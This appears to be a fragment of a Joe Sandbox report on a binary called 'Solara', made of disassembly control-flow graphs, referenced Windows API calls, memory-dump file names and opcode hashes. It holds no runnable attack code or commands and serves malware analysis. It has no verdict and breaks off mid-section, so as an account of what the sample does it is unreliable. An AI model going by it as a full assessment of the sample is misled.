                                                                                                                                      • API String ID: 2911764282-0
                                                                                                                                      • Opcode ID: cd031e20cc317099dee482850fc2608615ee4bdffdf786ba48dcd3ce03636f46
                                                                                                                                      • Instruction ID: 8cdffd46ab8303ac465272b80cad94489a2187e0791127cfaaf8fde27e2bb298
                                                                                                                                      • Opcode Fuzzy Hash: cd031e20cc317099dee482850fc2608615ee4bdffdf786ba48dcd3ce03636f46
                                                                                                                                      • Instruction Fuzzy Hash: 6271B1B2D10319DFCB10DFA4DC497AEBBB5BF48310F140629E814A7392E73599698BA1
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: p"
                                                                                                                                      • API String ID: 0-4226117248
                                                                                                                                      • Opcode ID: 0787cc6e9ec6a6633acd8ee29b6f0ebb7b3ee94ff7600731344b5c2b40a0985d
                                                                                                                                      • Instruction ID: c671ec63e5a8066a82a15f5d9d644d1a8eba4ee99e2b5a93dda4adf5dc931a2f
                                                                                                                                      • Opcode Fuzzy Hash: 0787cc6e9ec6a6633acd8ee29b6f0ebb7b3ee94ff7600731344b5c2b40a0985d
                                                                                                                                      • Instruction Fuzzy Hash: D0214B336202660BC75C9F386CA2037FB4BDB867A0705562AED529F2D2E521DD3082E4

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetConsoleWindow.KERNELBASE ref: 002024DD
                                                                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 002024E6
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00202524
                                                                                                                                        • Part of subcall function 0020F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,0020253A,?,?,00000000), ref: 0020F129
                                                                                                                                        • Part of subcall function 0020F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,0020253A,?,?,00000000), ref: 0020F142
                                                                                                                                        • Part of subcall function 0020F11D: CloseHandle.KERNEL32(?,?,?,0020253A,?,?,00000000), ref: 0020F154
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00202567
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00202578
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 00202589
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 0020259A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3956949563-0
                                                                                                                                      • Opcode ID: 7a85d9ad48b8b577c1e0b61484729b331853ff0a83beb96ff9c3e38bdcc12f22
                                                                                                                                      • Instruction ID: 5faf7575d5d43e78788dc654e76749fcbaa085a2b43abdb669e4e7a632a011a4
                                                                                                                                      • Opcode Fuzzy Hash: 7a85d9ad48b8b577c1e0b61484729b331853ff0a83beb96ff9c3e38bdcc12f22
                                                                                                                                      • Instruction Fuzzy Hash: ED2196F2D503159BDF10AF949C0ABDEBAB8AF04710F180165F508772C2E7B69964CBA6

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 51 21cf0b-21cf17 52 21cfa9-21cfac 51->52 53 21cfb2 52->53 54 21cf1c-21cf2d 52->54 55 21cfb4-21cfb8 53->55 56 21cf3a-21cf53 LoadLibraryExW 54->56 57 21cf2f-21cf32 54->57 60 21cf55-21cf5e GetLastError 56->60 61 21cfb9-21cfc9 56->61 58 21cfd2-21cfd4 57->58 59 21cf38 57->59 58->55 63 21cfa6 59->63 64 21cf60-21cf72 call 220554 60->64 65 21cf97-21cfa4 60->65 61->58 62 21cfcb-21cfcc FreeLibrary 61->62 62->58 63->52 64->65 68 21cf74-21cf86 call 220554 64->68 65->63 68->65 71 21cf88-21cf95 LoadLibraryExW 68->71 71->61 71->65
                                                                                                                                      APIs
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,75E5C5C8,?,0021D01A,?,?,00000000), ref: 0021CFCC
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                      • API String ID: 3664257935-537541572
                                                                                                                                      • Opcode ID: 9f01110aa240232cced4f4c41c9d36b916c8d1e7b44793d168e73164864729aa
                                                                                                                                      • Instruction ID: 2bc863ddd19a7f49c185fb425c2d49b46b268afaf40ace4406ff3fe68f9753a0
                                                                                                                                      • Opcode Fuzzy Hash: 9f01110aa240232cced4f4c41c9d36b916c8d1e7b44793d168e73164864729aa
                                                                                                                                      • Instruction Fuzzy Hash: BB213839BA1312BBC7318F64FC49A9A77A9AB61360F340113FC05A7690D730ED61CAD0

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 127 201750-2017eb call 219c30 130 201806-20180b 127->130 131 2017ed-201803 127->131 132 20181b-201821 130->132 133 20180d-201816 130->133 131->130 134 201851-201855 132->134 135 201823-201825 132->135 137 201b69-201b8c 133->137 139 201858-201898 call 204460 134->139 135->134 138 201827-201849 call 202c50 135->138 140 201be4-201c48 call 202f00 call 2032c0 call 21060c 137->140 141 201b8e-201b95 call 20d748 137->141 138->137 150 20184f 138->150 164 2018ca-2018e0 139->164 165 20189a-2018b4 139->165 140->137 152 201b97-201b9a call 2038e0 141->152 153 201b9f-201bad 141->153 150->139 152->153 157 201bd1-201be3 153->157 158 201baf-201bce 153->158 158->157 167 2018e6-2018f5 164->167 168 2019b9 164->168 165->164 179 2018b6-2018c6 165->179 169 2019bb-2019c1 167->169 170 2018fb 167->170 168->169 172 2019ff-201a03 169->172 173 201900-201914 170->173 177 201a92-201a96 172->177 178 201a09-201a11 172->178 175 201940-201965 173->175 176 201916-20191d 173->176 185 201968-201972 175->185 176->175 182 20191f-20192f 176->182 180 201b54-201b61 177->180 181 201a9c-201aa6 177->181 178->177 183 201a13-201a59 178->183 179->164 180->137 181->180 184 201aac 181->184 182->185 200 201a68-201a89 call 20def0 183->200 201 201a5b-201a62 183->201 190 201ab0-201ac4 184->190 187 201974-201992 185->187 188 2019aa-2019b2 185->188 187->173 193 201998-2019a8 187->193 194 2019b5-2019b7 188->194 195 201af0-201b1c 190->195 196 201ac6-201acd 190->196 193->194 194->169 203 201b1e-201b47 195->203 206 201b4f 195->206 196->195 198 201acf-201ae3 196->198 202 201ae5 198->202 198->203 210 201a8b-201a8d 200->210 201->200 204 2019d0-2019dd 201->204 202->206 203->190 205 201b4d 203->205 209 2019e0-2019fc 204->209 205->180 206->180 209->172 210->209
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strlen
                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                      • API String ID: 4218353326-1866435925
                                                                                                                                      • Opcode ID: 7dafe65954eaa3124943e4e5382250efa8de0d4ab4231c8ac82ae34d08415772
                                                                                                                                      • Instruction ID: c50a9525ffeb7084991e2d9a3a39fd97a64b551725d1666c4409f51ea7a11a5b
                                                                                                                                      • Opcode Fuzzy Hash: 7dafe65954eaa3124943e4e5382250efa8de0d4ab4231c8ac82ae34d08415772
                                                                                                                                      • Instruction Fuzzy Hash: 11F16C75A102198FCB14CF68C494BADB7F1FF88324F198269E815AB3E2D774AD51CB90

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 212 215349-215354 213 215356-215369 call 2176e4 call 217dcf 212->213 214 21536a-21537d call 2153da 212->214 220 2153ab 214->220 221 21537f-21539c CreateThread 214->221 225 2153ad-2153b9 call 21542a 220->225 223 2153ba-2153bf 221->223 224 21539e-2153aa GetLastError call 21770a 221->224 226 2153c1-2153c4 223->226 227 2153c6-2153ca 223->227 224->220 226->227 227->225
                                                                                                                                      APIs
                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00015470,00000000,00000000,00000000), ref: 00215392
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00202513,00000000,00000000), ref: 0021539E
                                                                                                                                      • __dosmaperr.LIBCMT ref: 002153A5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2744730728-0
                                                                                                                                      • Opcode ID: 3ce6cef220c6b84937c095c5a18dba1c502677625df22703f81894fcae652507
                                                                                                                                      • Instruction ID: 02296ddf1b858433173d4bbe798f3e9caa7a196b26e63e57a783af024d402c45
                                                                                                                                      • Opcode Fuzzy Hash: 3ce6cef220c6b84937c095c5a18dba1c502677625df22703f81894fcae652507
                                                                                                                                      • Instruction Fuzzy Hash: 3B016D7252062AEBCF159FA0DC09AEE3BE8EFA0351F104099F81192150EBB0DAA1DA50

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 232 2154ee-2154fb call 21c2bb 235 21553b-21553e ExitThread 232->235 236 2154fd-215505 232->236 236->235 237 215507-21550b 236->237 238 215512-215518 237->238 239 21550d call 21ce1b 237->239 241 215525-21552b 238->241 242 21551a-21551c 238->242 239->238 241->235 244 21552d-21552f 241->244 242->241 243 21551e-21551f CloseHandle 242->243 243->241 244->235 245 215531-215535 FreeLibraryAndExitThread 244->245 245->235
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0021C2BB: GetLastError.KERNEL32(00000000,?,002176E9,0021D306,?,?,0021C1B7,00000001,00000364,?,00000005,000000FF,?,00215495,00238E38,0000000C), ref: 0021C2BF
                                                                                                                                        • Part of subcall function 0021C2BB: SetLastError.KERNEL32(00000000), ref: 0021C361
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,002153D9,?,?,002154CE,00000000), ref: 0021551F
                                                                                                                                      • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,002153D9,?,?,002154CE,00000000), ref: 00215535
                                                                                                                                      • ExitThread.KERNEL32 ref: 0021553E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1991824761-0
                                                                                                                                      • Opcode ID: cf2acef33b555e9d99e57e1f8d3d782478b0914590f0ca3d13e29c9fe385e168
                                                                                                                                      • Instruction ID: 950a33aa2b4ca6f29c416368319159d6e8ba07adc5dcfd7a0bb3c82822c0ab9e
                                                                                                                                      • Opcode Fuzzy Hash: cf2acef33b555e9d99e57e1f8d3d782478b0914590f0ca3d13e29c9fe385e168
                                                                                                                                      • Instruction Fuzzy Hash: 11F05470110A12FBCB355F75984C69B3ADBAF50370B588A94F869C75A0DB30DDA28750

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • GetCurrentProcess.KERNEL32(00000002,?,00215721,00218396,00218396,?,00000002,75E5C5C8,00218396,00000002), ref: 00215670
                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00215721,00218396,00218396,?,00000002,75E5C5C8,00218396,00000002), ref: 00215677
                                                                                                                                      • ExitProcess.KERNEL32 ref: 00215689
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                      • Opcode ID: 41549fd9d056191a7c80575f5a8ae7914d7c1bb5e806d3f433f1284e0a21ca3f
                                                                                                                                      • Instruction ID: 5b567e2ab98275dcd9a9e9beff74b41f069c4844fdb73a347b10716d7820ccbd
                                                                                                                                      • Opcode Fuzzy Hash: 41549fd9d056191a7c80575f5a8ae7914d7c1bb5e806d3f433f1284e0a21ca3f
                                                                                                                                      • Instruction Fuzzy Hash: 6BD09232010658FBCF012F61EC0D8993F6EEFA0381B888451B9494A072DF329DA2DA94

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 353 223bf4-223c16 354 223e09 353->354 355 223c1c-223c1e 353->355 356 223e0b-223e0f 354->356 357 223c20-223c3f call 217f78 355->357 358 223c4a-223c6d 355->358 364 223c42-223c45 357->364 359 223c73-223c79 358->359 360 223c6f-223c71 358->360 359->357 363 223c7b-223c8c 359->363 360->359 360->363 365 223c8e-223c9c call 2229a2 363->365 366 223c9f-223caf call 223f21 363->366 364->356 365->366 371 223cb1-223cb7 366->371 372 223cf8-223d0a 366->372 375 223ce0-223cf6 call 223f9e 371->375 376 223cb9-223cbc 371->376 373 223d61-223d81 WriteFile 372->373 374 223d0c-223d12 372->374 377 223d83-223d89 GetLastError 373->377 378 223d8c 373->378 380 223d14-223d17 374->380 381 223d4d-223d5a call 2243cd 374->381 393 223cd9-223cdb 375->393 382 223cc7-223cd6 call 224365 376->382 383 223cbe-223cc1 376->383 377->378 387 223d8f-223d9a 378->387 388 223d39-223d4b call 224591 380->388 389 223d19-223d1c 380->389 392 223d5f 381->392 382->393 383->382 390 223da1-223da4 383->390 394 223e04-223e07 387->394 395 223d9c-223d9f 387->395 399 223d34-223d37 388->399 396 223da7-223da9 389->396 397 223d22-223d2f call 2244a8 389->397 390->396 392->399 393->387 394->356 395->390 400 223dd7-223de3 396->400 401 223dab-223db0 396->401 397->399 399->393 404 223de5-223deb 400->404 405 223ded-223dff 400->405 406 223db2-223dc4 401->406 407 223dc9-223dd2 call 217770 401->407 404->354 404->405 405->364 406->364 407->364
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00223F9E: GetConsoleOutputCP.KERNEL32(75E5C5C8,00000000,00000000,?), ref: 00224001
                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00218584,?), ref: 00223D79
                                                                                                                                      • GetLastError.KERNEL32(?,?,00218584,?,002187C8,00000000,?,00000000,002187C8,?,?,?,00238FE8,0000002C,002186B4,?), ref: 00223D83
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2915228174-0
                                                                                                                                      • Opcode ID: db214807a8610110ea9280df14795781a1830cd4c2504f163733588117dbe8b1
                                                                                                                                      • Instruction ID: d86d8ebddbcee25c4ea73f20be1c192357326c42c900005e42f4b322a3e34ab5
                                                                                                                                      • Opcode Fuzzy Hash: db214807a8610110ea9280df14795781a1830cd4c2504f163733588117dbe8b1
                                                                                                                                      • Instruction Fuzzy Hash: 2161C37192412ABFDF11CFE8E844AEEBBB9BF09304F140146E900B7251D779DA21CBA0

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 410 2243cd-224422 call 210050 413 224497-2244a7 call 20a6e1 410->413 414 224424 410->414 416 22442a 414->416 418 224430-224432 416->418 419 224434-224439 418->419 420 22444c-224471 WriteFile 418->420 421 224442-22444a 419->421 422 22443b-224441 419->422 423 224473-22447e 420->423 424 22448f-224495 GetLastError 420->424 421->418 421->420 422->421 423->413 425 224480-22448b 423->425 424->413 425->416 426 22448d 425->426 426->413
                                                                                                                                      APIs
                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00223D5F,00000000,002187C8,?,00000000,?,00000000), ref: 00224469
                                                                                                                                      • GetLastError.KERNEL32(?,00223D5F,00000000,002187C8,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,00218584), ref: 0022448F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 442123175-0
                                                                                                                                      • Opcode ID: dfaca3f13252253d272e6e0841eab8643bfb2fb88bcb9770b33e65f598d10a9b
                                                                                                                                      • Instruction ID: dcd47fe12d7dcfb8155904e44d9198acb2a097f58bffa7fa6d333953559c2d87
                                                                                                                                      • Opcode Fuzzy Hash: dfaca3f13252253d272e6e0841eab8643bfb2fb88bcb9770b33e65f598d10a9b
                                                                                                                                      • Instruction Fuzzy Hash: CF21B430A10229ABCF15EF59EC80ADDB7B9FB48305F1444A9E906D7211D630DD52CF60

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 427 2090f0-209130 call 20efc1 430 209136-20913d 427->430 431 2091c7-2091c9 call 20b317 427->431 432 209143-209149 430->432 433 2091ce-2091df call 20b317 430->433 431->433 435 209174-20919a call 20efd2 call 2092f0 432->435 436 20914b-209172 call 20efd2 432->436 443 20919f-2091aa 433->443 435->443 445 2091b6-2091c6 436->445 443->445 446 2091b1 call 20a660 443->446 446->445
                                                                                                                                      APIs
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002091C9
                                                                                                                                      • std::_Throw_Cpp_error.LIBCPMT ref: 002091D7
                                                                                                                                        • Part of subcall function 0020EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00208E4A,0020A2F0), ref: 0020EFE7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3666349979-0
                                                                                                                                      • Opcode ID: a3b70335aa7019cbf2fbe905c843d038c0ae131906c16f465c381bb0f0b9be38
                                                                                                                                      • Instruction ID: 25292061ef4bd626d9dc33072d0f25abef7293791d05a12f001cb166a5082501
                                                                                                                                      • Opcode Fuzzy Hash: a3b70335aa7019cbf2fbe905c843d038c0ae131906c16f465c381bb0f0b9be38
                                                                                                                                      • Instruction Fuzzy Hash: EE21F1B1A007469BDB109F648945BAEFBB5FB04320F144228E52A673C3D774A965CBD2

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
